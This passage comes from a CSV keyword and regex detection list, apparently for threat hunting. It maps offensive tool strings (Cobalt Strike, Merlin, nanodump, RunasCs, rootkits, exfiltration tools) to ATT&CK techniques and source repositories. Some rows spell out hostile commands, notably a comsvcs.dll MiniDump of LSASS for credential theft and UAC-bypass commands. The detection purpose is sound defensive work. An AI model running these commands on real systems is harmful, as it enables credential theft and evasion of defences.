Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","384","71","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*run 
thief:latest*",".{0,1000}run\sthief\:latest.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*run_kmod.sh netkit.ko netkit*",".{0,1000}run_kmod\.sh\snetkit\.ko\snetkit.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*run_ppl_dump_exploit*",".{0,1000}run_ppl_dump_exploit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*run_ppl_medic_exploit*",".{0,1000}run_ppl_medic_exploit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*run_python.sh client/shell.py*",".{0,1000}run_python\.sh\sclient\/shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*run_server.bat",".{0,1000}run_server\.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*runasadmin uac-cmstplua*",".{0,1000}runasadmin\suac\-cmstplua.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*runasadmin uac-token-duplication*",".{0,1000}runasadmin\suac\-token\-duplication.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RunasCreateProcessAsUserW*",".{0,1000}RunasCreateProcessAsUserW.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides 
using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs.exe*",".{0,1000}RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs.exe*",".{0,1000}RunasCs\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs.zip*",".{0,1000}RunasCs\.zip.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs_net2.exe*",".{0,1000}RunasCs_net2\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs_net2.exe*",".{0,1000}RunasCs_net2\.exe.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCsMain*",".{0,1000}RunasCsMain.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*RunasCs-master*",".{0,1000}RunasCs\-master.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*runas-netonly *",".{0,1000}runas\-netonly\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*runasppl_check*",".{0,1000}runasppl_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*RunAsWinTcb.exe*",".{0,1000}RunAsWinTcb\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*RunAsWinTcb-master*",".{0,1000}RunAsWinTcb\-master.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*RunCleanup-77740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunCleanup\-77740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*RunCodeExec-75740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunCodeExec\-75740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*run-dll 
SharpSploit*",".{0,1000}run\-dll\sSharpSploit.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*rundll32 charlotte.dll*",".{0,1000}rundll32\scharlotte\.dll.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*rundll32 merlin.dll,Magic*",".{0,1000}rundll32\smerlin\.dll,Magic.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32 merlin.dll,Merlin*",".{0,1000}rundll32\smerlin\.dll,Merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32 merlin.dll,Run*",".{0,1000}rundll32\smerlin\.dll,Run.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32.exe agressor.dll*dec*",".{0,1000}rundll32\.exe\sagressor\.dll.{0,1000}dec.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products. Mortar Loader performs encryption and decryption of selected binary inside the memory streams and executes it directly without writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*rundll32.exe C:\Users\Public\*",".{0,1000}rundll32\.exe\sC\:\\Users\\Public\\.{0,1000}","offensive_tool_keyword","powershell","Defense evasion technique","T1218.011","TA0005","N/A","N/A","Defense Evasion","https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id*",".{0,1000}rundll32\.exe\sC\:\\windows\\System32\\comsvcs\.dll\sMiniDump\s\(Get\-Process\slsass\)\.id.{0,1000}","offensive_tool_keyword","powershell","credential dumping activity","T1003.001","TA0006","N/A","N/A","Collection","https://www.trendmicro.com/en_us/research/22/g/analyzing-penetration-testing-tools-that-threat-actors-use-to-br.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*rundll32.exe* merlin.dll,Magic*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Magic.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32.exe* merlin.dll,Merlin*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*rundll32.exe* merlin.dll,Run*",".{0,1000}rundll32\.exe.{0,1000}\smerlin\.dll,Run.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*RunDLL32JSStager*",".{0,1000}RunDLL32JSStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Run-EXEonRemote*",".{0,1000}Run\-EXEonRemote.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Run-EXEonRemote.ps1*",".{0,1000}Run\-EXEonRemote\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*RunExfil-78740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunExfil\-78740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*runFakeTerminal*",".{0,1000}runFakeTerminal.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*run-hiphp-tk.sh*",".{0,1000}run\-hiphp\-tk\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. 
It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","1","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*Running final exploit packet*",".{0,1000}Running\sfinal\sexploit\spacket.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Running final exploit packet*",".{0,1000}Running\sfinal\sexploit\spacket.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","N/A","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*Running hijacking process*",".{0,1000}Running\shijacking\sprocess.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*running SharpHound*",".{0,1000}running\sSharpHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Running the exploit be patient................................*",".{0,1000}Running\sthe\sexploit\sbe\spatient\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*RunOF.exe -*",".{0,1000}RunOF\.exe\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run 
object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*RunOF.Internals*",".{0,1000}RunOF\.Internals.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*run-pilot -targetIP *",".{0,1000}run\-pilot\s\-targetIP\s.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*RunRansomware-76740706-9DEC-EC11-BB3D-0022482CA4A7.json*",".{0,1000}RunRansomware\-76740706\-9DEC\-EC11\-BB3D\-0022482CA4A7\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*Runs a powershell command while attempting to bypass AMSI*",".{0,1000}Runs\sa\spowershell\scommand\swhile\sattempting\sto\sbypass\sAMSI.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" 
